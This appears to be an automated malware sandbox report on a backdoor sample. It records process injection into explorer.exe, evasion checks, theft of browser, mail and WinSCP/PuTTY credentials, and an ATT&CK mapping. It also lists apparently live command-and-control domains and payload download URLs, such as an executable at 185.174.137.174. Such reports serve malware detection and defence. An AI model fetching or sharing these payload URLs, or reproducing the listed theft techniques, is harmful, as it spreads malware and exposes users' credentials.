                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409947 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040B33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409D7C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041165B SetUnhandledExceptionFilter,

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeDomain query: github.com
                Source: C:\Windows\explorer.exeDomain query: dldsystem.com
                Source: C:\Windows\explorer.exeDomain query: furubujjul.net
                Source: C:\Windows\explorer.exeDomain query: pelegisr.com
                Source: C:\Windows\explorer.exeDomain query: avtlsgosecure.com
                Source: C:\Windows\explorer.exeNetwork Connect: 185.174.137.174 80
                Source: C:\Windows\explorer.exeFile created: idduhcf.1.drJump to dropped file
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\thduhcfSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\thduhcfSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\6246.exeMemory written: C:\Users\user\AppData\Local\Temp\6246.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 5261ACC
                Source: C:\Users\user\AppData\Roaming\thduhcfThread created: unknown EIP: 5361ACC
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeThread created: unknown EIP: 5321A80
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A2F380
                Source: C:\Windows\explorer.exeMemory written: PID: 6040 base: A2F380 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 6076 base: 7FF69BD28150 value: 90
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
                Source: explorer.exe, 00000001.00000000.419226663.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.411309802.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
                Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000001.00000000.367436647.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.402857693.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.318909618.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
                Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,
                Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00411DEA GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium13
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts612
                Process Injection
                2
                Obfuscated Files or Information
                1
                Input Capture
                2
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)1
                Software Packing
                1
                Credentials in Registry
                115
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration4
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                DLL Side-Loading
                NTDS431
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer125
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                File Deletion
                LSA Secrets121
                Virtualization/Sandbox Evasion
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common11
                Masquerading
                Cached Domain Credentials3
                Process Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items121
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job612
                Process Injection
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 724879 Sample: file.exe Startdate: 17/10/2022 Architecture: WINDOWS Score: 100 54 jamesmillion.xyz 2->54 56 dldsystem.com 2->56 58 7 other IPs or domains 2->58 76 Snort IDS alert for network traffic 2->76 78 Multi AV Scanner detection for domain / URL 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 10 other signatures 2->82 9 file.exe 2->9         started        12 thduhcf 2->12         started        14 idduhcf 2->14         started        signatures3 process4 signatures5 104 Detected unpacking (changes PE section rights) 9->104 106 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->106 108 Maps a DLL or memory area into another process 9->108 16 explorer.exe 17 9->16 injected 110 Checks if the current machine is a virtual machine (disk enumeration) 12->110 112 Creates a thread in another existing process (thread injection) 12->112 process6 dnsIp7 48 dldsystem.com 162.144.15.231, 443, 49708, 49712 UNIFIEDLAYER-AS-1US United States 16->48 50 185.174.137.174, 49693, 80 SUPERSERVERSDATACENTERRU Russian Federation 16->50 52 4 other IPs or domains 16->52 40 C:\Users\user\...\thduhcf:Zone.Identifier, Unknown 16->40 dropped 42 C:\Users\user\AppData\Roaming\thduhcf, Unknown 16->42 dropped 44 C:\Users\user\AppData\Roaming\idduhcf, Unknown 16->44 dropped 46 7 other malicious files 16->46 dropped 68 System process connects to network (likely due to code injection or exploit) 16->68 70 Benign windows process drops PE files 16->70 72 Injects code into the Windows Explorer (explorer.exe) 16->72 74 3 other signatures 16->74 21 69A9.exe 16->21         started        24 8C19.exe 16->24         started        27 explorer.exe 6 16->27         started        29 5 other processes 16->29 file8 signatures9 process10 dnsIp11 84 Detected unpacking (changes PE section rights) 21->84 86 Machine Learning detection for dropped file 21->86 88 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->88 102 3 other signatures 21->102 60 aaa.apiaaaeg.com 45.136.151.102, 49702, 49706, 49713 ENZUINC-US Latvia 24->60 62 star-mini.c10r.facebook.com 157.240.20.35, 443, 49695, 49699 FACEBOOKUS United States 24->62 64 3 other IPs or domains 24->64 90 Antivirus detection for dropped file 24->90 92 Tries to detect virtualization through RDTSC time measurements 24->92 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->94 96 Tries to steal Mail credentials (via file / registry access) 27->96 98 Tries to harvest and steal browser information (history, passwords, etc) 27->98 100 Injects a PE file into a foreign processes 29->100 31 6246.exe 12 29->31         started        34 WerFault.exe 3 10 29->34         started        36 WerFault.exe 10 29->36         started        38 conhost.exe 29->38         started        signatures12 process13 dnsIp14 66 api.2ip.ua 162.0.217.254, 443, 49701 ACPCA Canada 31->66

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe39%VirustotalBrowse
                file.exe44%ReversingLabsWin32.Backdoor.Mokes
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\8C19.exe100%AviraHEUR/AGEN.1210630
                C:\Users\user\AppData\Local\Temp\8C19.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\6246.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\69A9.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\837D.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\4316.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\7795.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\7AF0.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                8.0.6246.exe.400000.6.unpack100%AviraHEUR/AGEN.1223627Download File
                7.0.7795.exe.6c0e67.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.0.7795.exe.6c0e67.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.0.837D.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.3.file.exe.720000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                5.3.thduhcf.710000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.4.unpack100%AviraHEUR/AGEN.1223627Download File
                7.0.7795.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.3.69A9.exe.21d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.837D.exe.5f0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.8.unpack100%AviraHEUR/AGEN.1223627Download File
                9.0.837D.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.10.unpack100%AviraHEUR/AGEN.1223627Download File
                5.2.thduhcf.700e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.0.837D.exe.5f0e67.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.3.837D.exe.600000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.8C19.exe.140000000.1.unpack100%AviraHEUR/AGEN.1201239Download File
                9.0.837D.exe.5f0e67.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.2.6246.exe.400000.0.unpack100%AviraHEUR/AGEN.1223627Download File
                6.2.69A9.exe.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.2.7795.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.7.unpack100%AviraHEUR/AGEN.1223627Download File
                8.0.6246.exe.400000.9.unpack100%AviraHEUR/AGEN.1223627Download File
                6.2.69A9.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.2.7795.exe.6c0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.8C19.exe.140000000.2.unpack100%AviraHEUR/AGEN.1201239Download File
                7.0.7795.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                7.3.7795.exe.6d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                10.0.8C19.exe.140000000.0.unpack100%AviraHEUR/AGEN.1201239Download File
                0.2.file.exe.710e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.0.6246.exe.400000.5.unpack100%AviraHEUR/AGEN.1223627Download File
                5.2.thduhcf.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.837D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                SourceDetectionScannerLabelLink
                jamesmillion.xyz12%VirustotalBrowse
                avtlsgosecure.com10%VirustotalBrowse
                raw.githubusercontent.com2%VirustotalBrowse
                aaa.apiaaaeg.com1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://avtlsgosecure.com/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf60300%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/0%URL Reputationsafe
                http://nuluitnulo.me/0%URL Reputationsafe
                http://winnlinne.com/lancer/get.php0%URL Reputationsafe
                http://bururutu44org.org/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adg0%Avira URL Cloudsafe
                http://nvulukuluir.net/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3awal0%Avira URL Cloudsafe
                http://liubertiyyyul.net/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b20%Avira URL Cloudsafe
                http://furubujjul.net/0%URL Reputationsafe
                http://youyouumenia5.org/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a0%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad10%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3aal0%Avira URL Cloudsafe
                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                http://guluiiiimnstra.net/0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/safe0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad60%Avira URL Cloudsafe
                https://dldsystem.com/7.exe0%Avira URL Cloudsafe
                http://185.174.137.174/s.exe100%Avira URL Cloudmalware
                https://dldsystem.com/jamesp.exe0%Avira URL Cloudsafe
                http://aaa.apiaaaeg.coaa.apiaaaeg.com/0%Avira URL Cloudsafe
                https://pelegisr.com/upload/ChromeSetup.exe0%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aae0%Avira URL Cloudsafe
                http://furubujjul.net/Mozilla/5.00%URL Reputationsafe
                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3ag0%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                star-mini.c10r.facebook.com
                157.240.20.35
                truefalse
                  high
                  jamesmillion.xyz
                  104.192.2.242
                  truetrueunknown
                  avtlsgosecure.com
                  34.91.216.49
                  truefalseunknown
                  github.com
                  140.82.121.3
                  truefalse
                    high
                    raw.githubusercontent.com
                    185.199.108.133
                    truefalseunknown
                    dldsystem.com
                    162.144.15.231
                    truetrue
                      unknown
                      api.2ip.ua
                      162.0.217.254
                      truefalse
                        high
                        aaa.apiaaaeg.com
                        45.136.151.102
                        truetrueunknown
                        furubujjul.net
                        104.21.93.30
                        truetrue
                          unknown
                          pelegisr.com
                          185.220.204.62
                          truetrue
                            unknown
                            1drv.ms
                            13.107.42.12
                            truefalse
                              high
                              www.facebook.com
                              unknown
                              unknownfalse
                                high
                                onedrive.live.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://aaa.apiaaaeg.com/check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf6030true
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dldsystem.com/jamesp.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingfalse
                                    high
                                    http://185.174.137.174/s.exetrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://avtlsgosecure.com/false
                                    • URL Reputation: safe
                                    unknown
                                    http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3atrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://aaa.apiaaaeg.com/check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b2true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://nuluitnulo.me/true
                                    • URL Reputation: safe
                                    unknown
                                    http://winnlinne.com/lancer/get.phptrue
                                    • URL Reputation: safe
                                    unknown
                                    http://bururutu44org.org/true
                                    • URL Reputation: safe
                                    unknown
                                    http://nvulukuluir.net/true
                                    • URL Reputation: safe
                                    unknown
                                    http://liubertiyyyul.net/true
                                    • URL Reputation: safe
                                    unknown
